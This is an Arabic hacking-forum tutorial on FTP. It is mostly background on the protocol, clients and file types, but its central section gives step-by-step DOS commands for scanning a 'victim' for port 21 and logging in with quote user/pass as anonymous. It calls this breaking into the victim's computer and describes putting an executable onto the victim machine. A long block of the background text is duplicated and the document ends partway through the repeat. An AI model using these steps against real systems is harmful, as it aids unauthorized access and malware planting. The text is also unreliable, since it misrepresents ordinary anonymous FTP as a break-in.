الرئيسية
السلام عليكم و رحمة الله و بركاته اقدم لكم شرح ممل جدا لاختراق الدوس على عدة دروس و المعروف و الاسم الادق
(اختراق الftp اختصار file transfeer protocol)............
مقدمة
ظهرت خدمة بروتوكول نقل الملفات (FTP) في المراحل المبكرة من مسيرة الإنترنت، ولذلك فقد مرت بمراحل عديدة من التطوير للارتقاء بأدائها، ويعتقد الخبراء أن تطورها سيواكب تطور الإنترنت ويسير معها جنبا إلى جنب، مما سيعزز دورها في مستقبل التكنولوجيا في العالم السيبيري (cyber technology).
ملاحظة:
قد لا تؤدي عبارة خدمة بروتوكول نقل الملفات المعنى المطلوب منها، الذي ينص على أنها خدمة الإنترنت المستندة إلى بروتوكول نقل الملفات (Internet service based on File Transfer protocol)، وسعيا للاختصار نستخدم عبارة بروتوكول نقل الملفات أو خدمة نقل الملفات لتدل على المعنى نفسه.
ماهو نقل الملفات FTP?
FTP هي اختصار لكلمة File Transfer Protocol وتعني بروتوكول نقل الملفات، وهذه الخدمة هي احدى تسهيلات TCP/IP التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات FTP الرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم تشغيل مختلفة وعليه فلديها أشكال Formats مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم به FTP, وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفاً في أميركا الى جهازنا.
ما هي خدمة بروتوكول نقل الملفات
يُعد المصطلح FTP اختصاراً لبروتوكول نقل الملفات (File Transfer Protocol)، وهو طريقة سريعة لنقل الملفات (الكبيرة عادةً) بين أجهزة الكمبيوتر البعيدة عن بعضها والموجودة في شبكة تستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت.
ويتشابه بروتوكول نقل الملفات (FTP) مع بروتوكول نقل النص المترابط (HTTP) في كون كلا البروتوكولين ينقل الملفات من الأجهزة الخادمة البعيدة (remote servers)، ولكنهما يختلفان في أن بروتوكول نقل النص المترابط (HTTP) يستخدم المستعرض (Web browser) لعرض الملفات المنقولة على شاشة المستخدم، وتكون تلك الملفات ذات محتوى متعدد الوسائط (Multimedia) –هذا المحتوى الذي يُميز صفحات الويب- ، بينما يُخزِن بروتوكول نقل الملفات (FTP) الملفات المنقولة على القرص الصلب لجهاز المستخدم.
وتبرز أهمية هذه الخدمة عند نقل الملفات الكبيرة التي يعجز البريد الإلكتروني عن نقلها. إذ يمكن لبروتوكول نقل الملفات أن يتعامل مع أي نوع من الملفات سواء أكان معقداً مثل ملفات لغة النص المترابط (HTML) المضغوطة (compressed) وملفات الرسوم (graphic files)، أم بسيطاً مثل الملفات النصية (text files). ويمكن أن تُنقَل هذه الملفات من أجهزة خادمة بعيدة وتُخزَّن على القرص الصلب لجهاز المستخدم عن طريق عملية التنزيل (downloading)، كما تظهر فائدة استخدام خدمة بروتوكول نقل الملفات عند تصميم موقع شخصي على الويب، والحاجة إلى نقل ملفات الموقع إلى الأجهزة الخادمة (servers) عن طريق عملية التحميل (uploading). ويختلف بروتوكول نقل الملفات (FTP) عن البروتوكولات الأخرى التي لا تعتمد على الإنترنت في نقل الملفات مثل: Kermit، وXMODEM، إضافة إلى ZMODEM.
FTP الخادم و FTP المستفيد
تعتمد خدمة (FTP) على مبدأ الخادم/المستفيد (client/server)، ويكون فيه خادم FTP عبارة عن خادم ملفات يعتمد بروتوكول (FTP) في تحميل وتنزيل الملفات على أدلته (directories) شرط وجود الصلاحية المحددة باسم تعريف خاص (ID) وكلمة مرور (password) .
ومن الجدير بالذكر أن الملفات الموجودة في خادم (FTP) تكون مضغوطة، وبالتالي يكون استرجاعها أكثر سرعة وسهولة، وتتعدد صيغ الملفات المضغوطة المستعملة؛ إذ نجد: .arc ، و .cpt ، و .zip، و .Z، بينما تكون صِيغ ملفات الرسوم من مثل: ".gif، و .jpg"، أما الملفات المخزنة بصيغة ثنائية (binary files) فتكون صيغها من مثل: ".hqx، و .uu". وإلى جانب الملفات السابقة تحتوي الأجهزة الخادمة لبروتوكول ملفات “read me” التي تبتدئ أسماؤها عادة بالرمز "00"، وبالتالي تظهر هذه الملفات في بداية القائمة. وتنبع أهمية التمييز بين أنواع الملفات من أن خدمة بروتوكول نقل الملفات تستخدم تعليمات مختلفة تتمتع بمواصفات نقل متمايزة لكل نوع من تلك الأنواع.
ومن جهة أخرى، فإنه يلزم لنقل الملفات باستخدام بروتوكول (FTP) وجود برنامج يدعى برنامج مستفيد FTP (FTP client)، وهو برنامج يُمَكِّن المستخدم من تنزيل وتحميل الملفات من وإلى موقع FTP ما عبر شبكة تَستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت. وتوجد الكثير من التطبيقات التي تقوم بوظيفة مستفيد FTP وتُناسب مُختلف أنواع الأجهزة، ويمكن تنزيل الكثير منها مجاناً عن طريق الإنترنت.
المستخدم (anonymous FTP)
تسمح هذه الميزة للمستخدمين بالولوج إلى مواقع (FTP) دون الحاجة إلى التعريف بأنفسهم، إذ يمكنهم استخدام كلمة “anonymous” أو كلمة “ftp” على أنها اسم المستخدم (user-ID)، ويُوضع البريد الإلكتروني للمستخدم مكان كلمة مرور (password). ويغلب استخدام هذه الميزة في عمليات تنزيل الملفات من المواقع العامة التي توفرها بعض الجامعات والشركات الحكومية والخاصة على الإنترنت. ولكن مشكلة هذه المواقع تكمن في صعوبة الاتصال بها بسبب الضغط الكثيف عليها.
لماذا خدمة بروتوكول نقل الملفات (FTP) بدلاً من البريد الإلكتروني ومستعرضات الويب؟
تتميز خدمة (FTP) عن البريد الإلكتروني (Email) بأمور عديدة فهي أكثر فعالية في نقل الملفات الكبيرة، كما أنها أسرع من البريد الإلكتروني، مما يكفل تنفيذ المهمة نفسها في زمن أقل من زمن نقلها عن طريق البريد الإلكتروني، وهذا يجعل خدمة بروتوكول نقل الملفات أوفر.
أما ما يُميز خدمة بروتوكول نقل الملفات (FTP) عن مستعرضات الويب (Web browsers) فهو:
• تستطيع خدمة (FTP) القيام بعملية تحميل الملفات (uploading)، إذ تنقل المعلومات وخاصة وثائق (HTML) إلى الخادم البعيد الذي تُخزن عليه صفحات الويب.
• تَستخدِم خدمة (FTP) أوامرَ (commands) لإجراء عمليات التحديث (حذف، أو إعادة تسمية أو نقل أو نسخ) على الملفات الموجودة على الخادم.
• تدعم خدمة (FTP) السرية (privacy)، إذ يكون للمستخدمين المرخصين كلمات مرور (passwords) تسمح لهم بالولوج إلى الخادمات البعيدة.
**********************************
الاختراق من الدوس (2)
علاقة (FTP) مع البريد الإلكتروني:
بدأت تُستخدم مؤخراً طريقة أخرى لاسترجاع الملفات عن طريق خادم بريدي خاص لخدمة (FTP)، لا تحتاج فيها إلى برنامج مستفيد FTP (FTP client)، ولكن يكفي أن يكون لك حساب بخدمة البريد الإلكتروني (Email account)، إذ يقوم خادم بريد بروتوكول نقل الملفات بالعمليات التي تقوم بها خدمة نقل الملفات، ثمَّ تُرسَل النتيجة عن طريق البريد الإلكتروني إلى المستخدم، ولا تخفى فوائد هذا التوظيف لخدمة بروتوكول نقل الملفات في البريد الإلكتروني لما تقدمه من سرعة وضمان في نقل الملفات الكبيرة، لم يكن بمقدور مستخدم البريد العادي الحصول عليها، وإليك فيما يلي أمثلة عن بعض الأجهزة الخادمة لبريد بروتوكول نقل الملفات (FTP):
ftpmail@ppa.dec.comftpmail@decwrl.dec.comftpmail@src.doc.ic.ac.uk
لولوج إلى (FTP) عن طريق مستعرضات الويب
تُستخدَم مستعرضات الويب للولوج إلى ملفات موجودة في مواقع FTP، ويتم ذلك بسهولة عبر النقر على الروابط links. فللاتصال بموقع FTP تستبدل الحروف http في حقل العنوان (URL) بالحروف التالية ftp، ويكتب بعدها اسم الموقع (site name). ويمكن أن يُستخدم كل من:Netscape Navigator, Internet Explorer في الولوج إلى مواقع FTP، مع وجود الكثير من القيود التي لا يمكن حلها إلا بالحصول على التراخيص المناسبة.
برامج مستفيد FTP
يوجد العديد من برامج مستفيد FTP التي تعمل على أجهزة أي بي إم (IBM) أو الأجهزة المتوافقة معها، وتلائم العديد من أنظمة التشغيل (مثل: دوس (DOS)، وويندوز (Windows). كما إن نظم التشغيل الأحدث مثل ويندوز (Windows 95) 95 وويندوز (Windows 98) 98 وويندوز(Windows NT) NT تدعم خدمة بروتوكول نقل الملفات عبر برنامج خدمي (Utility program) هو ftp يظهر على شكل واجهة أوامر سطرية (command-line interface)؛ تشبه برنامج مستفيد FTP المُستخدم في نظام يونيكس (Unix)، كما تستخدم أجهزة أخرى تعمل على نظام يونيكس (Unix) برنامجَ مستفيد FTP آخر يدعى (NcFTP).
كما توجد العديد من البرامج التي تعمل في بيئة رسومية تدعم خاصة السحب والإفلات (drag and drop)، ونذكر مثالين على هذه البرامج:
• البرنامج WS FTP: للعمل على منصة التشغيل ويندوز (Windows).
• البرنامج FETCH: للعمل على منصة التشغيل ماكنتوش (Macintosh).
أقسام نقل الملفات:
نقل الملفات ينقسم الى قسمين:
===================
تنزيل الملفات Download:
وهو جلب الملفات من الكمبيوتر المضيف Host الى الجهاز المحلي Local.
ارسال الملفات Uplaod:
وهو ارسال الملفات من الكمبيوتر المحلي Local الى الكمبيوتر المضيف Host.
ومن الناحية الأمنية فهناك نوعان لنقل الملفات:
نقل مؤمن Secure FTP:
تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف.
نقل مجهول Anonymous FTP:
لاتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالباً استخدام guest أو anonymous عوضاً عنهما.
تصنف مصادر البرامج على الانترنت الى ثلاثة أقسام:
ملكية عامة Public Domain:
وضعت البرامج هنا للاستخدام العام فليس هناك حقوق ملكية لأحد ولا قيود على استخدامها وتوزيعها وتعديلها.
مصادر مجانية Freeware:
يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ولا يجوز تعديلها أو بيعها.
مصادر مشتركة Shareware:
يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لاتتضمن جميع المميزات ويجب تحطيم النسخ بعد انتهاء مدتها.
FTP والفيروسات:
يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين:
ASCII:
اختصاراً لـ(American Standard Code for Information Interchange) والملفات من هذا النوع تحتوي على سبعة جزيئات bits تتراوح قيمتها بين الصفر و 127. ويستخدم هذا المصطلح للتعبير عن المعيار الذي يقوم بتحويل الأحرف الى أرقام في الكمبيوتر. وتستخدم الملفات النصية هذا النوع من الصيغ.
Binary:
وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات bits تتراوح بين الصفر و 255 وتندرج الصور والبرامج والملفات المضغوطة تحت هذا النوع.
والفيروسات لا يمكن أن تنتقل عبر ملفات ASCII كما لايمكن أن تنتقل عبر الصور كصيغ jpg & gif & bmp وغيرها من امتدادات الصور ولا عبر ملفات الفيديو والصوت مثل avi - ram - mpg - mp3 - wav وغيرها، وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة ماتكون: exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - b64 - bhx، كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات MS Office، لذلك احذر من هذه الملفات وافحصها دائماً قبل تشغيلها.
طريقة نقل الملفات FTP:
هناك طرق عديدة لنقل الملفات وهي:
نقل الملفات باستخدام نظام UNIX
تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر UNIX:
ascii: لنقل ملفات ASCII النصية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر.
binary: لنقل الملفات الثنائية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر.
status: لفحص الملف ومعرفة هل هو من نوع ASCII أو Binary.
help: لعرض قائمة بأوامر UNIX.
dir: عرض محتويات الدليل
ls: عرض محتويات الدليل الحالي.
cd directory: تغيير الدليل.
get filename: جلب الملف المطلوب وانزاله على جهازك.
mget filename:جلب مجموعة من الملفات.
pwd: طباعة الدليل الحالي.
bye: انهاء الارتباط والخروج من النظام البعيد.
نقل الملفات باستخدام حساب Shell:
أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمثلاً سوف تدخل حسابك في Tripod عن طريق Unix Shell، نكتب أولاً الأمر ftp متبوعاً بالوجهة المرادة فيصبح: ftp ftp.tripod.com ثم ندخل الاسم وهو عل سبيل المثال "IronPrivate"، ثم نقوم بادخال الرقم السري وهو مثلاً "******". وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر Unix المعتادة.
نقل الملفات باستخدام المتصفح Browser:
نقل الملفات عن طريق المتصفحات سهل جداً فما عليك سوى ادخال عنوان الموقع URL ويبدأ العنوان بكلمة //tp ثم العنوان بدلاً من كلمة //:http للعناوين العادية، بعد الدخول الى موقع الـFTP ستأتي الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لانزاله.
نقل الملفات باستخدام حساب SLIP/PPP:
أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة Client Programs. وأفضل برنامج تابع يمكن استخدامه للنوافذ Windows هو برنامج Ws_ftp.
- استخدام برنامج Ws_ftp LE 5.06:
ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج، سيظهر لك مربع حوار Session Profile والذي من خلاله تقوم بتسجيل الدخول، اكتب في خانة Profile Name اسم حساب الدخول؛ على سبيل المثال My Home Page In Tripod واكتب في خانة Host Name اسم الملقن وفي هذا المثال هو ftp.tripod.com ثم في خانة Host Type اختر Auto Detect لكي يقوم بالتدقيق التلقائي في نوع نظام الجهاز المضيف، بعد ذلك قم بكتابة الاسم في خانة User ID وهو مثلاً IronPrivate ثم الرقم السري في خانة Password وسيظهر مخفياً على هيئة نجوم ******, ثم اضغط OK.
************************************
الاختراق من الدوس (3) و(4)
نقل الملفات باستخدام الاتصال الشبكي البعيد Telnet:
Telnet هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر مضيف جاعلاً جهازه وكأنه جزء من ذلك الكمبيوتر البعيد. ويختلف العرض حسب نظام الكمبيوتر المضيف. اذا كان الجهاز البعيد يستخدم نظام Windows فلا مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض الأوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة بالأوامر اللازمة.
استخدام برنامج Telnet من Windows:
ترفق Windows برنامجاً سهلاً يسمى Telnet يمكنك الدخول عليه بالضغط على قائمة ابدأ Start ثم تشغيل Run ثم اكتب Telnet وستنفتح لك صفحة البدء للبرنامج.. من Connect اختر Remote System. في صندوق الحوار Connect الذي سيظهر لك اكتب في خانة Host Name اسم ملقن الجهاز المضيف ثم اكتب في خانة Port الميناء أو المنفذ ( اذا كان لديك) او اتركه كما هو، ثم اختر من الـTerm Type ، ان كان لديك والا قم بالتجربة. بعد ذلك اضغط Connect وعندما يتم الربط فستحتاج لادخال الاسم والرقم السري. وبعد الانتهاء من النقل اخترDisconnect من قائمة Connect وبعد ذلك اختر Exit.
=========
الاختراق :
=======
FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البور
21
مفتوح و هو البور الخاص ب
FTP
و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها
Superscanne
بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
سوف تطلع لك نافدة في الدوس مكتوب عليها
FTP>
ؤوكي لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
سوف تتحصل عب النتيجة التالية
FTP>
To
أكتب بجانب
To
رقم الإبي للضحية ثم إضغط على إدخال
و الآن خد بالك معي
إدا تحصلت على هدا الرد فقد تخطيت خطوة
Connected to http://www.assassin.com/
220 websrv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp>quote user ftp
إدا تحصلت على هدا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail name) as password.
و الآن أكتب الكتابة التالية
ftp>quote cwd ~root
إذا تحصلت على هدا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp>quote pass ftp
إدا تحصلت على هدا الرد فقد تخطيت خطوة
و نجحت في الإقتحام
230 Anonymous user logged in.
مبروك أنت الآن في جهاز الضحية
ما عليك الآن الا ان تقوم بإستعمال
اوامر الف تي بي
هذه هى اوامر الاف تى بى مبسطة لاستخدامها فى نقل ملفات من و الى الضحية و غير ذلك
Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe
Put
العملية العكسية ل Get
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية
(اختراق الftp اختصار file transfeer protocol)............
مقدمة
ظهرت خدمة بروتوكول نقل الملفات (FTP) في المراحل المبكرة من مسيرة الإنترنت، ولذلك فقد مرت بمراحل عديدة من التطوير للارتقاء بأدائها، ويعتقد الخبراء أن تطورها سيواكب تطور الإنترنت ويسير معها جنبا إلى جنب، مما سيعزز دورها في مستقبل التكنولوجيا في العالم السيبيري (cyber technology).
ملاحظة:
قد لا تؤدي عبارة خدمة بروتوكول نقل الملفات المعنى المطلوب منها، الذي ينص على أنها خدمة الإنترنت المستندة إلى بروتوكول نقل الملفات (Internet service based on File Transfer protocol)، وسعيا للاختصار نستخدم عبارة بروتوكول نقل الملفات أو خدمة نقل الملفات لتدل على المعنى نفسه.
ماهو نقل الملفات FTP?
FTP هي اختصار لكلمة File Transfer Protocol وتعني بروتوكول نقل الملفات، وهذه الخدمة هي احدى تسهيلات TCP/IP التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات FTP الرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم تشغيل مختلفة وعليه فلديها أشكال Formats مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم به FTP, وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفاً في أميركا الى جهازنا.
ما هي خدمة بروتوكول نقل الملفات
يُعد المصطلح FTP اختصاراً لبروتوكول نقل الملفات (File Transfer Protocol)، وهو طريقة سريعة لنقل الملفات (الكبيرة عادةً) بين أجهزة الكمبيوتر البعيدة عن بعضها والموجودة في شبكة تستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت.
ويتشابه بروتوكول نقل الملفات (FTP) مع بروتوكول نقل النص المترابط (HTTP) في كون كلا البروتوكولين ينقل الملفات من الأجهزة الخادمة البعيدة (remote servers)، ولكنهما يختلفان في أن بروتوكول نقل النص المترابط (HTTP) يستخدم المستعرض (Web browser) لعرض الملفات المنقولة على شاشة المستخدم، وتكون تلك الملفات ذات محتوى متعدد الوسائط (Multimedia) –هذا المحتوى الذي يُميز صفحات الويب- ، بينما يُخزِن بروتوكول نقل الملفات (FTP) الملفات المنقولة على القرص الصلب لجهاز المستخدم.
وتبرز أهمية هذه الخدمة عند نقل الملفات الكبيرة التي يعجز البريد الإلكتروني عن نقلها. إذ يمكن لبروتوكول نقل الملفات أن يتعامل مع أي نوع من الملفات سواء أكان معقداً مثل ملفات لغة النص المترابط (HTML) المضغوطة (compressed) وملفات الرسوم (graphic files)، أم بسيطاً مثل الملفات النصية (text files). ويمكن أن تُنقَل هذه الملفات من أجهزة خادمة بعيدة وتُخزَّن على القرص الصلب لجهاز المستخدم عن طريق عملية التنزيل (downloading)، كما تظهر فائدة استخدام خدمة بروتوكول نقل الملفات عند تصميم موقع شخصي على الويب، والحاجة إلى نقل ملفات الموقع إلى الأجهزة الخادمة (servers) عن طريق عملية التحميل (uploading). ويختلف بروتوكول نقل الملفات (FTP) عن البروتوكولات الأخرى التي لا تعتمد على الإنترنت في نقل الملفات مثل: Kermit، وXMODEM، إضافة إلى ZMODEM.
FTP الخادم و FTP المستفيد
تعتمد خدمة (FTP) على مبدأ الخادم/المستفيد (client/server)، ويكون فيه خادم FTP عبارة عن خادم ملفات يعتمد بروتوكول (FTP) في تحميل وتنزيل الملفات على أدلته (directories) شرط وجود الصلاحية المحددة باسم تعريف خاص (ID) وكلمة مرور (password) .
ومن الجدير بالذكر أن الملفات الموجودة في خادم (FTP) تكون مضغوطة، وبالتالي يكون استرجاعها أكثر سرعة وسهولة، وتتعدد صيغ الملفات المضغوطة المستعملة؛ إذ نجد: .arc ، و .cpt ، و .zip، و .Z، بينما تكون صِيغ ملفات الرسوم من مثل: ".gif، و .jpg"، أما الملفات المخزنة بصيغة ثنائية (binary files) فتكون صيغها من مثل: ".hqx، و .uu". وإلى جانب الملفات السابقة تحتوي الأجهزة الخادمة لبروتوكول ملفات “read me” التي تبتدئ أسماؤها عادة بالرمز "00"، وبالتالي تظهر هذه الملفات في بداية القائمة. وتنبع أهمية التمييز بين أنواع الملفات من أن خدمة بروتوكول نقل الملفات تستخدم تعليمات مختلفة تتمتع بمواصفات نقل متمايزة لكل نوع من تلك الأنواع.
ومن جهة أخرى، فإنه يلزم لنقل الملفات باستخدام بروتوكول (FTP) وجود برنامج يدعى برنامج مستفيد FTP (FTP client)، وهو برنامج يُمَكِّن المستخدم من تنزيل وتحميل الملفات من وإلى موقع FTP ما عبر شبكة تَستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت. وتوجد الكثير من التطبيقات التي تقوم بوظيفة مستفيد FTP وتُناسب مُختلف أنواع الأجهزة، ويمكن تنزيل الكثير منها مجاناً عن طريق الإنترنت.
المستخدم (anonymous FTP)
تسمح هذه الميزة للمستخدمين بالولوج إلى مواقع (FTP) دون الحاجة إلى التعريف بأنفسهم، إذ يمكنهم استخدام كلمة “anonymous” أو كلمة “ftp” على أنها اسم المستخدم (user-ID)، ويُوضع البريد الإلكتروني للمستخدم مكان كلمة مرور (password). ويغلب استخدام هذه الميزة في عمليات تنزيل الملفات من المواقع العامة التي توفرها بعض الجامعات والشركات الحكومية والخاصة على الإنترنت. ولكن مشكلة هذه المواقع تكمن في صعوبة الاتصال بها بسبب الضغط الكثيف عليها.
لماذا خدمة بروتوكول نقل الملفات (FTP) بدلاً من البريد الإلكتروني ومستعرضات الويب؟
تتميز خدمة (FTP) عن البريد الإلكتروني (Email) بأمور عديدة فهي أكثر فعالية في نقل الملفات الكبيرة، كما أنها أسرع من البريد الإلكتروني، مما يكفل تنفيذ المهمة نفسها في زمن أقل من زمن نقلها عن طريق البريد الإلكتروني، وهذا يجعل خدمة بروتوكول نقل الملفات أوفر.
أما ما يُميز خدمة بروتوكول نقل الملفات (FTP) عن مستعرضات الويب (Web browsers) فهو:
• تستطيع خدمة (FTP) القيام بعملية تحميل الملفات (uploading)، إذ تنقل المعلومات وخاصة وثائق (HTML) إلى الخادم البعيد الذي تُخزن عليه صفحات الويب.
• تَستخدِم خدمة (FTP) أوامرَ (commands) لإجراء عمليات التحديث (حذف، أو إعادة تسمية أو نقل أو نسخ) على الملفات الموجودة على الخادم.
• تدعم خدمة (FTP) السرية (privacy)، إذ يكون للمستخدمين المرخصين كلمات مرور (passwords) تسمح لهم بالولوج إلى الخادمات البعيدة.
**********************************
الاختراق من الدوس (2)
علاقة (FTP) مع البريد الإلكتروني:
بدأت تُستخدم مؤخراً طريقة أخرى لاسترجاع الملفات عن طريق خادم بريدي خاص لخدمة (FTP)، لا تحتاج فيها إلى برنامج مستفيد FTP (FTP client)، ولكن يكفي أن يكون لك حساب بخدمة البريد الإلكتروني (Email account)، إذ يقوم خادم بريد بروتوكول نقل الملفات بالعمليات التي تقوم بها خدمة نقل الملفات، ثمَّ تُرسَل النتيجة عن طريق البريد الإلكتروني إلى المستخدم، ولا تخفى فوائد هذا التوظيف لخدمة بروتوكول نقل الملفات في البريد الإلكتروني لما تقدمه من سرعة وضمان في نقل الملفات الكبيرة، لم يكن بمقدور مستخدم البريد العادي الحصول عليها، وإليك فيما يلي أمثلة عن بعض الأجهزة الخادمة لبريد بروتوكول نقل الملفات (FTP):
ftpmail@ppa.dec.comftpmail@decwrl.dec.comftpmail@src.doc.ic.ac.uk
لولوج إلى (FTP) عن طريق مستعرضات الويب
تُستخدَم مستعرضات الويب للولوج إلى ملفات موجودة في مواقع FTP، ويتم ذلك بسهولة عبر النقر على الروابط links. فللاتصال بموقع FTP تستبدل الحروف http في حقل العنوان (URL) بالحروف التالية ftp، ويكتب بعدها اسم الموقع (site name). ويمكن أن يُستخدم كل من:Netscape Navigator, Internet Explorer في الولوج إلى مواقع FTP، مع وجود الكثير من القيود التي لا يمكن حلها إلا بالحصول على التراخيص المناسبة.
برامج مستفيد FTP
يوجد العديد من برامج مستفيد FTP التي تعمل على أجهزة أي بي إم (IBM) أو الأجهزة المتوافقة معها، وتلائم العديد من أنظمة التشغيل (مثل: دوس (DOS)، وويندوز (Windows). كما إن نظم التشغيل الأحدث مثل ويندوز (Windows 95) 95 وويندوز (Windows 98) 98 وويندوز(Windows NT) NT تدعم خدمة بروتوكول نقل الملفات عبر برنامج خدمي (Utility program) هو ftp يظهر على شكل واجهة أوامر سطرية (command-line interface)؛ تشبه برنامج مستفيد FTP المُستخدم في نظام يونيكس (Unix)، كما تستخدم أجهزة أخرى تعمل على نظام يونيكس (Unix) برنامجَ مستفيد FTP آخر يدعى (NcFTP).
كما توجد العديد من البرامج التي تعمل في بيئة رسومية تدعم خاصة السحب والإفلات (drag and drop)، ونذكر مثالين على هذه البرامج:
• البرنامج WS FTP: للعمل على منصة التشغيل ويندوز (Windows).
• البرنامج FETCH: للعمل على منصة التشغيل ماكنتوش (Macintosh).
أقسام نقل الملفات:
نقل الملفات ينقسم الى قسمين:
===================
تنزيل الملفات Download:
وهو جلب الملفات من الكمبيوتر المضيف Host الى الجهاز المحلي Local.
ارسال الملفات Uplaod:
وهو ارسال الملفات من الكمبيوتر المحلي Local الى الكمبيوتر المضيف Host.
ومن الناحية الأمنية فهناك نوعان لنقل الملفات:
نقل مؤمن Secure FTP:
تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف.
نقل مجهول Anonymous FTP:
لاتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالباً استخدام guest أو anonymous عوضاً عنهما.
تصنف مصادر البرامج على الانترنت الى ثلاثة أقسام:
ملكية عامة Public Domain:
وضعت البرامج هنا للاستخدام العام فليس هناك حقوق ملكية لأحد ولا قيود على استخدامها وتوزيعها وتعديلها.
مصادر مجانية Freeware:
يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ولا يجوز تعديلها أو بيعها.
مصادر مشتركة Shareware:
يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لاتتضمن جميع المميزات ويجب تحطيم النسخ بعد انتهاء مدتها.
FTP والفيروسات:
يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين:
ASCII:
اختصاراً لـ(American Standard Code for Information Interchange) والملفات من هذا النوع تحتوي على سبعة جزيئات bits تتراوح قيمتها بين الصفر و 127. ويستخدم هذا المصطلح للتعبير عن المعيار الذي يقوم بتحويل الأحرف الى أرقام في الكمبيوتر. وتستخدم الملفات النصية هذا النوع من الصيغ.
Binary:
وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات bits تتراوح بين الصفر و 255 وتندرج الصور والبرامج والملفات المضغوطة تحت هذا النوع.
والفيروسات لا يمكن أن تنتقل عبر ملفات ASCII كما لايمكن أن تنتقل عبر الصور كصيغ jpg & gif & bmp وغيرها من امتدادات الصور ولا عبر ملفات الفيديو والصوت مثل avi - ram - mpg - mp3 - wav وغيرها، وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة ماتكون: exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - b64 - bhx، كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات MS Office، لذلك احذر من هذه الملفات وافحصها دائماً قبل تشغيلها.
طريقة نقل الملفات FTP:
هناك طرق عديدة لنقل الملفات وهي:
نقل الملفات باستخدام نظام UNIX
تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر UNIX:
ascii: لنقل ملفات ASCII النصية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر.
binary: لنقل الملفات الثنائية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر.
status: لفحص الملف ومعرفة هل هو من نوع ASCII أو Binary.
help: لعرض قائمة بأوامر UNIX.
dir: عرض محتويات الدليل
ls: عرض محتويات الدليل الحالي.
cd directory: تغيير الدليل.
get filename: جلب الملف المطلوب وانزاله على جهازك.
mget filename:جلب مجموعة من الملفات.
pwd: طباعة الدليل الحالي.
bye: انهاء الارتباط والخروج من النظام البعيد.
نقل الملفات باستخدام حساب Shell:
